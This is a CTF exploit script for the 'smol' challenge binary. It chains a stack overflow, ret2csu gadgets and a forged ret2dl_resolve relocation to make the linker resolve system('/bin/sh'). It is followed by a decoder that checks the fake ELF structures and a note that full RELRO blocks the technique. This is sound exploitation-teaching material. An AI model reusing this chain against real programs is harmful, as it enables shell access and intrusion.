smol_exploit.py
#!/usr/bin/env python3
# One of the best challs: it needs ret2csu combined with ret2dl_resolve.
# The challenge is a normal dynamically linked program, but with no function that writes to standard output.
# It reads input with read() using a length far greater than the buffer size, so it is vulnerable to a stack buffer overflow.
# Since the program has no output function, there is no way to leak memory addresses,
# so the address of system() has to be resolved by us: ret2dl_resolve, my favourite technique.
# This method abuses lazy binding to make the dynamic linker resolve a symbol of our choice, such as system or execve.
# The idea is to place fake Elf64_Rela / Elf64_Sym structures in a user-controlled area (.bss)
# and then return straight into PLT0 with a large fake reloc_arg on top of the stack,
# so that the linker's lookup of the relocation entry lands on our fake structures.
# Finding the right place for the fake structures and getting the index arithmetic right is all it takes to pop a shell.
# Here ret2csu is needed as well as ret2dl_resolve, because read() takes 3 arguments
# and without a pop rdx gadget the third one can only be set up through the __libc_csu_init gadgets.
from pwn import *
import time

e = ELF("./smol")
r = process("./smol")  # The NahamCon remote containers for the pwn challenges have been closed, so exploit the binary locally

bin_sh = 0x4040d8  # Address where the "/bin/sh" string will land in our controlled area in .bss
st_name = 0x3c48   # Offset from .dynstr to the "system" string we place in .bss

# Stage 1: overflow, then use the __libc_csu_init gadgets to call read(0, 0x404088, 0x58)
payload1 = b'A' * 12            # Padding up to the saved return address
payload1 += p64(0x4011ca)       # csu gadget 1: pop rbx, rbp, r12, r13, r14, r15; ret
payload1 += p64(0x807c5)        # rbx: call [r15 + rbx*8] with r15 = 0 hits 0x403e28, the _init pointer in .dynamic (DT_INIT); a harmless call that leaves the popped registers intact
payload1 += p64(0x807c6)        # rbp = rbx + 1, so the cmp rbp, rbx after the call falls through
payload1 += p64(0)              # r12 -> edi: fd 0
payload1 += p64(0x404088)       # r13 -> rsi: .bss address where the second input is written
payload1 += p64(0x58)           # r14 -> rdx: size of the second read
payload1 += p64(0)              # r15: base for the call [r15 + rbx*8]
payload1 += p64(0x4011b0)       # csu gadget 2: mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15 + rbx*8]
payload1 += p64(0) * 7          # add rsp, 8 plus six pops after the call; these values are never used again
payload1 += p64(0x401040)       # read@plt: perform the second read into .bss
payload1 += p64(0x401164)       # ret gadget to keep the stack 16-byte aligned (Ubuntu 18.04 and later)
payload1 += p64(0x4011d3)       # pop rdi; ret
payload1 += p64(bin_sh)         # rdi = address of "/bin/sh" from the second input
payload1 += p64(0x401020)       # PLT0: push link_map; jmp _dl_runtime_resolve
payload1 += p64(0x275)          # Fake reloc_arg: .rela.plt + 0x275 * 24 points at our fake Elf64_Rela
r.send(payload1)  # Send the first payload
time.sleep(0.4)   # Give the first read time to complete before sending the second payload

# Stage 2: the fake relocation structures, read into .bss at 0x404088
payload2 = p64(0x404020)        # Elf64_Rela.r_offset: read's .got.plt slot, where the resolved system address is stored
payload2 += p64(0x28900000007)  # r_info = (0x289 << 32) | 7: symbol index 0x289 into .dynsym, type R_X86_64_JUMP_SLOT
payload2 += p64(0) * 4          # r_addend = 0, then three qwords of padding so the fake Elf64_Sym sits at .dynsym + 0x289 * 24
payload2 += p32(st_name)        # Elf64_Sym.st_name: offset from .dynstr to our "system" string
payload2 += p8(0x12)            # st_info: STB_GLOBAL << 4 | STT_FUNC
payload2 += p8(0)               # st_other: default visibility, so ld.so performs a real symbol lookup
payload2 += p16(0)              # st_shndx: SHN_UNDEF, as for a genuine imported symbol
payload2 += p64(0) * 2          # st_value, st_size
payload2 += b"system\x00\x00"   # The symbol name to resolve, padded to 8 bytes
payload2 += b"/bin/sh\x00"      # Lands at bin_sh (0x4040d8) and is passed as the argument to system
r.send(payload2)  # Send the second payload
r.interactive()   # Our much-awaited shell
r.close()
# When submitting the flag there was a note in the challenge description that said you may need to bruteforce; that was the moment when
# I came to know that it is an unintended solution... And moreover my exploit was one-shot and got the RCE in seconds..
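As an added illustration (not part of the original exploit or the challenge), the decoder below unpacks the fake Elf64_Rela and Elf64_Sym that payload2 builds, in the order the dynamic linker's _dl_fixup walks them, and checks the arithmetic the comments above rely on: that the reloc_arg 0x275 and the symbol index in r_info both land on the buffer the second read() fills, that the name string and "/bin/sh" sit where the constants say, and that everything fits in the 0x58 bytes read. It uses only the standard ELF64 field layouts from elf.h and the constants already in the script; the .rela.plt, .dynsym and .dynstr base addresses it prints are derived from those constants rather than read from the binary, so they are assumptions to confirm with `readelf -S ./smol`.

```python
import struct

# Constants taken from the exploit above (page values, not re-derived from the binary).
BSS_BUF = 0x404088        # where the second read() writes payload2
READ_LEN = 0x58           # size of that read
RELOC_ARG = 0x275         # fake reloc_arg left on the stack before jumping to PLT0
ST_NAME = 0x3c48          # st_name used in the fake Elf64_Sym
BIN_SH = 0x4040d8         # address the exploit passes to system()

# Standard ELF64 definitions (glibc elf.h).
SIZEOF_RELA = 24          # Elf64_Rela: r_offset, r_info, r_addend
SIZEOF_SYM = 24           # Elf64_Sym: st_name, st_info, st_other, st_shndx, st_value, st_size
R_X86_64_JUMP_SLOT = 7
STB_GLOBAL, STT_FUNC, SHN_UNDEF, STV_DEFAULT = 1, 2, 0, 0


def build_payload2():
    """Rebuild payload2 byte-for-byte with struct instead of pwntools' p64/p32/p8/p16."""
    rela = struct.pack("<QQq", 0x404020, (0x289 << 32) | R_X86_64_JUMP_SLOT, 0)
    pad = b"\x00" * 24                      # padding so the fake Elf64_Sym lands on a .dynsym index boundary
    sym = struct.pack("<IBBHQQ", ST_NAME, (STB_GLOBAL << 4) | STT_FUNC, STV_DEFAULT, SHN_UNDEF, 0, 0)
    return rela + pad + sym + b"system\x00\x00" + b"/bin/sh\x00"


def decode_fake_structs(buf, base=BSS_BUF, reloc_arg=RELOC_ARG):
    """Parse buf the way _dl_fixup walks it: the Elf64_Rela first, then the Elf64_Sym its
    r_info selects, then the NUL-terminated name. Also derive the section bases the indices imply."""
    r_offset, r_info, r_addend = struct.unpack_from("<QQq", buf, 0)
    sym_off = SIZEOF_RELA + 24              # rela + the 24 bytes of padding
    st_name, st_info, st_other, st_shndx, st_value, st_size = struct.unpack_from("<IBBHQQ", buf, sym_off)
    name_off = sym_off + SIZEOF_SYM
    name = buf[name_off:buf.index(b"\x00", name_off)].decode("ascii")
    binsh_off = buf.index(b"/bin/sh\x00")
    sym_idx = r_info >> 32
    return {
        "r_offset": r_offset,
        "r_type": r_info & 0xFFFFFFFF,
        "r_addend": r_addend,
        "sym_index": sym_idx,
        "st_bind": st_info >> 4,
        "st_type": st_info & 0xF,
        "st_visibility": st_other & 0x3,
        "st_shndx": st_shndx,
        "symbol": name,
        "binsh_addr": base + binsh_off,
        # Where .rela.plt, .dynsym and .dynstr must start for these indices to land in the buffer
        # (derived from the constants, not read from the ELF; verify with readelf -S).
        "implied_rela_plt": base - reloc_arg * SIZEOF_RELA,
        "implied_dynsym": (base + sym_off) - sym_idx * SIZEOF_SYM,
        "implied_dynstr": (base + name_off) - st_name,
    }


def check_layout(buf, base=BSS_BUF, read_len=READ_LEN, reloc_arg=RELOC_ARG):
    """Return the conditions _dl_fixup relies on that the buffer fails; an empty list means consistent."""
    d = decode_fake_structs(buf, base, reloc_arg)
    problems = []
    if len(buf) > read_len:
        problems.append("payload is longer than the %#x-byte read" % read_len)
    if d["r_type"] != R_X86_64_JUMP_SLOT:
        problems.append("r_type must be R_X86_64_JUMP_SLOT (7)")   # _dl_fixup asserts this
    if d["st_visibility"] != STV_DEFAULT:
        problems.append("non-default visibility makes _dl_fixup skip the lookup and use st_value")
    if d["st_shndx"] != SHN_UNDEF:
        problems.append("st_shndx should be SHN_UNDEF, as in a genuine PLT import")
    if (d["st_bind"], d["st_type"]) != (STB_GLOBAL, STT_FUNC):
        problems.append("st_info should be STB_GLOBAL | STT_FUNC (0x12)")
    if d["binsh_addr"] != BIN_SH:
        problems.append("bin_sh constant does not match where /bin/sh lands in the buffer")
    return problems


if __name__ == "__main__":
    p2 = build_payload2()
    for key, val in decode_fake_structs(p2).items():
        print("%-18s %s" % (key, hex(val) if isinstance(val, int) else val))
    print("problems:", check_layout(p2) or "none")
```

The decoder stops where the page's constants stop: glibc additionally consults the DT_VERSYM table at the same symbol index when the binary carries symbol versioning, which is not modelled here. From the defensive side, the whole path only exists because the binary uses lazy binding; linking with full RELRO (`-Wl,-z,relro,-z,now`) resolves every import at load time and maps .got.plt read-only, so PLT0 and _dl_fixup are never reached at run time and a fake reloc_arg has nothing to act on. `checksec` reports the RELRO level directly.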